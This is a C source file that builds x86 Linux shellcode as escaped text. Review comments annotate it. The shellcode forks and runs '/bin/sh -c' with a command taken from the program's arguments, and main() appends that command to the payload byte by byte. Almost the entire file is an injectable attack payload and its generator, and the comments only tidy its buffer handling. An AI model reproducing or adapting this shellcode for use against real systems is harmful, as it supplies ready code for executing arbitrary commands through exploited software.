#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Escaped TEXT form of a byte sequence, not the bytes themselves: every
 * group below is written with a doubled backslash, so the array holds the
 * four-character sequences `\x60`, `\xb8`, ... as printable text and no
 * element of it is a raw byte value. main() memcpy()s this text and then
 * appends further "\xNN" escapes to it, so sizeof(code) is the text
 * length plus the terminating NUL that main() later overwrites.
 * The trailing comments are the author's disassembly notes for each group;
 * the addresses quoted in them are the author's fixed link addresses and
 * are left as written.
 */
char code[] =
"\\x60" /* pusha */
"\\xb8\\x02\\x00\\x00\\x00" /* mov $0x2,%eax */
"\\xcd\\x80" /* int $0x80 */
"\\x83\\xf8\\x00" /* cmp $0x0,%eax */
"\\x74\\x02" /* je 8048383 <execve> */
"\\xeb\\x24" /* jmp 80483a7 <end> */
"\\xb8\\x0b\\x00\\x00\\x00" /* mov $0xb,%eax */
"\\x6a\\x00" /* push $0x0 */
"\\xeb\\x59" /* jmp 80483e5 <cmd> */
"\\xeb\\x4f" /* jmp 80483dd <arg1> */
"\\xeb\\x40" /* jmp 80483d0 <arg2> */
"\\x5b" /* pop %ebx */
"\\x53" /* push %ebx */
"\\x89\\xe1" /* mov %esp,%ecx */
"\\xba\\x00\\x00\\x00\\x00" /* mov $0x0,%edx */
"\\xcd\\x80" /* int $0x80 */
"\\xb8\\x01\\x00\\x00\\x00" /* mov $0x1,%eax */
"\\xbb\\x00\\x00\\x00\\x00" /* mov $0x0,%ebx */
"\\xcd\\x80" /* int $0x80 */
"\\xb8\\x07\\x00\\x00\\x00" /* mov $0x7,%eax */
"\\xbb\\xff\\xff\\xff\\xff" /* mov $0xffffffff,%ebx */
"\\xbe\\x00\\x00\\x00\\x00" /* mov $0x0,%esi */
"\\x56" /* push %esi */
"\\x89\\xe1" /* mov %esp,%ecx */
"\\xba\\x00\\x00\\x00\\x00" /* mov $0x0,%edx */
"\\xcd\\x80" /* int $0x80 */
"\\x83\\xc4\\x04" /* add $0x4,%esp */
"\\x61" /* popa */
"\\xb8\\x01\\x00\\x00\\x00" /* mov $0x1,%eax */
"\\xbb\\x00\\x00\\x00\\x00" /* mov $0x0,%ebx */
"\\xcd\\x80" /* int $0x80 */
"\\xe8\\xbb\\xff\\xff\\xff" /* call 8048390 <l3> */
"\\x2f\\x62\\x69\\x6e\\x2f"
"\\x73\\x68\\x00" /* /bin/sh */
"\\xe8\\xac\\xff\\xff\\xff" /* call 804838e <l2> */
"\\x2d\\x63\\x00" /* sub $0xa2e80063,%eax -- NOTE(review): the disassembler read string data here; 2d 63 00 is ASCII "-c" plus NUL */
"\\xe8\\xa2\\xff\\xff\\xff" /* call 804838c <l1> */;
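/*
 * Assemble, in memory, the escaped text of code[] followed by one "\xNN"
 * escape per byte of the program's arguments joined by single spaces.
 *
 * argv[1..argc-1] are concatenated with ' ' separators into cmd; each byte
 * of cmd is then appended to a copy of code[] as a four-character escape.
 *
 * The visible source never prints or otherwise consumes the assembled text.
 * NOTE(review): confirm whether the listing is truncated after this block.
 *
 * Exits with status 1 when no argument is supplied or an allocation fails;
 * returns 0 otherwise.
 */
int main(int argc, char **argv) {
    if (argc < 2 || !argv[1]) {
        exit(1);
    }

    /* Size of the joined command: the argument bytes plus one separator per
     * argument; the slot of the final separator becomes the terminating NUL
     * (argc counts argv[0], so this over-allocates by one byte). */
    size_t len = 0;
    for (int i = 1; i < argc; i++) {
        len += strlen(argv[i]);
    }
    len += (size_t)argc;

    /* calloc so the buffer starts out as an empty string: strcat needs a
     * NUL-terminated destination and malloc'd memory is indeterminate. */
    char *cmd = calloc(len, 1);
    if (!cmd) {
        exit(1);
    }
    for (int i = 1; i < argc; i++) {
        strcat(cmd, argv[i]);
        strcat(cmd, "\x20");
    }
    cmd[strlen(cmd) - 1] = '\0';  /* drop the trailing separator */

    /* code[] is escaped text, so sizeof(code) is its length plus NUL. Every
     * command byte adds exactly four characters ("\xNN"), so the bound is
     * exact for any number of arguments; the original sized this from
     * argv[1] alone and overflowed with more than one argument. */
    size_t cmdlen = strlen(cmd);
    size_t cap = sizeof(code) + 4 * cmdlen;
    char *shell = malloc(cap);
    if (!shell) {
        free(cmd);
        exit(1);
    }
    memcpy(shell, code, sizeof(code));

    size_t pos = sizeof(code) - 1;  /* start on code[]'s terminating NUL */
    for (size_t i = 0; i < cmdlen; i++) {
        /* Append at the current end rather than sprintf(shell, "%s..", shell):
         * overlapping source and destination is undefined behaviour. The
         * unsigned char cast keeps %.2x at two digits for bytes >= 0x80,
         * which a plain (signed) char would sign-extend to eight digits. */
        pos += (size_t)snprintf(shell + pos, cap - pos, "\\x%.2x",
                                (unsigned char)cmd[i]);
    }

    free(shell);
    free(cmd);
    return 0;
}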